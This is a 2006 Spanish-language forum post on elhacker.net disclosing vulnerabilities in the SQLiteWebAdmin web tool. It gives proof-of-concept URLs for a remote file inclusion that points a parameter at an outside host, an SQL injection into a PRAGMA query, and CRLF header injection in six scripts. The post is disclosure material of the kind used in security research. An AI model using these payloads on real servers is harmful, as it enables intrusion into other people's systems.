elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
25 Mayo 2012, 09:39  


Tema destacado: Nueva página de elhacker.net en Google+ Google+

+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  [°] [UP] SQLiteWebAdmin Multiples Vulnerabilities
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [°] [UP] SQLiteWebAdmin Multiples Vulnerabilities  (Leído 1,168 veces)
sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.947


Lavando Platos


Ver Perfil WWW
[°] [UP] SQLiteWebAdmin Multiples Vulnerabilities
« en: 29 Julio 2006, 10:22 »


SQLiteWebAdmin
http://sourceforge.net/projects/sqlitewebadmin

Ellos si se preocupan por la seguridad.. de hecho este codigo es mas organizado.

de todas formas tienen sus bugs :P



Remote File Inclusion:
Código:
PoC:
http://www.server.com/lib/tpl.inc.php?conf[classpath]=http://www.google.com/?

SQLinjection:
Código:
http://www.server.com/table_editfield.php?table='+[SQL]

Este esta en el siguiente contexto:
PRAGMA table_info('$table')

La misma variable, puede ser usada en un bug de "Header Injection"
Código:
PoC:
http://www.server.com/table_editfield.php?table=%0D%0AHeader1:+value

Y aqui tambien:
Código:
PoC:
http://www.server.com/table_dropindex.php?table=%0D%0AHeader1:+value

Y aqui:
Código:
PoC:
http://www.server.com/table_dropfield.php?table=%0D%0AHeader1:+value

Y aqui:
Código:
PoC:
http://www.server.com/table_addindex.php?table=%0D%0AHeader1:+value

Y aqui:
Código:
PoC:
http://www.server.com/table_addfield.php?table=%0D%0AHeader1:+value

Y aqui:
Código:
PoC:
http://www.server.com/database_addtable.php?table=%0D%0AHeader1:+value

El mas peligroso es el RFI, los demas.. no tanto..

Saludos!!
« Última modificación: 27 Agosto 2006, 19:40 por Sdc » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines